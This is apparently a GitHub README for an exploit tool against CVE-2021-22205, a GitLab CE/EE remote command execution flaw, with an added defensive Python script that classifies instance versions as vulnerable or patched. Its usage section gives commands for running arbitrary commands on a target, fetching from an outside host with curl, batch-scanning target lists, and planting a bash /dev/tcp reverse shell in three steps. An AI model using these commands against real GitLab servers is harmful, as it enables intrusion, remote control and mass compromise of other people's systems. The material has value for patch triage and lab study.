GitHub - Al1ex/CVE-2021-22205: CVE-2021-22205 & GitLab CE/EE RCE
source link: https://github.com/Al1ex/CVE-2021-22205
Vuln Impact
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab did not properly validate image files that were passed to a file parser, which resulted in remote command execution.
Vuln Product
- GitLab CE/EE < 13.10.3
- GitLab CE/EE < 13.9.6
- GitLab CE/EE < 13.8.8
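As an added example (not part of the Al1ex repository), the following Python helper maps a GitLab version string, such as the 13.9.1-ce.0 image tag used in the Environment section, to vulnerable or patched according to the ranges listed above, so an inventory of instances can be triaged. The inventory passed to triage() is a constructed sample.

```python
# Added example, not from the original repository: classify a GitLab CE/EE
# version against the CVE-2021-22205 affected ranges listed in "Vuln Product".
import re
from typing import Dict, Tuple

# Branch-specific fixed releases: 13.8.8, 13.9.6 and 13.10.3.
FIXED = {(13, 10): (13, 10, 3), (13, 9): (13, 9, 6), (13, 8): (13, 8, 8)}
FIRST_AFFECTED = (11, 9, 0)   # "all versions starting from 11.9"
LATEST_FIX = (13, 10, 3)      # first release on the newest fixed branch


def parse_version(text: str) -> Tuple[int, int, int]:
    """Extract major.minor.patch from strings such as '13.9.1-ce.0' or 'v13.8.8'."""
    m = re.match(r"\s*v?(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"unrecognised GitLab version: {text!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def is_vulnerable(text: str) -> bool:
    """True if the version falls inside an affected range for CVE-2021-22205."""
    v = parse_version(text)
    if v < FIRST_AFFECTED:
        return False
    fix = FIXED.get(v[:2])
    if fix is not None:
        # 13.8 / 13.9 / 13.10: compare against that branch's backported fix.
        return v < fix
    # 11.9 .. 13.7 never received a backport; 13.11 and later ship the fix.
    return v < LATEST_FIX


def triage(inventory: Dict[str, str]) -> Dict[str, bool]:
    """Map each host of an inventory to True (vulnerable) or False (patched)."""
    return {host: is_vulnerable(ver) for host, ver in inventory.items()}


if __name__ == "__main__":
    # Constructed sample inventory; host names and versions are made up.
    sample = {"git-a": "13.9.1-ce.0", "git-b": "13.10.3", "git-c": "13.7.9"}
    for host, vulnerable in triage(sample).items():
        print(f"{host}: {'VULNERABLE' if vulnerable else 'patched'}")
```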
Environment
```bash
export GITLAB_HOME=/srv/gitlab
sudo docker run --detach \
  --hostname gitlab.example.com \
  --publish 443:443 --publish 80:80 \
  --name gitlab \
  --restart always \
  --volume $GITLAB_HOME/config:/etc/gitlab \
  --volume $GITLAB_HOME/logs:/var/log/gitlab \
  --volume $GITLAB_HOME/data:/var/opt/gitlab \
  gitlab/gitlab-ce:13.9.1-ce.0
```
Vuln Check
Basic usage
```bash
python3 CVE-2021-2205.py
```
Vuln check
```bash
python3 CVE-2021-2205.py -v true -t http://gitlab.example.com
```
Command execute
```bash
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "curl http://192.168.59.1:1234/1.txt"
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'Attacked by Al1ex!!!' > /tmp/1.txt"
```
Batch scan
```bash
python3 CVE-2021-2205.py -s true -f target.txt
```
Reverse shell
```bash
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh"
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "chmod +x /tmp/1.sh"
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "/bin/bash /tmp/1.sh"
```
Reference
https://github.com/mr-r3bot/Gitlab-CVE-2021-22205
https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html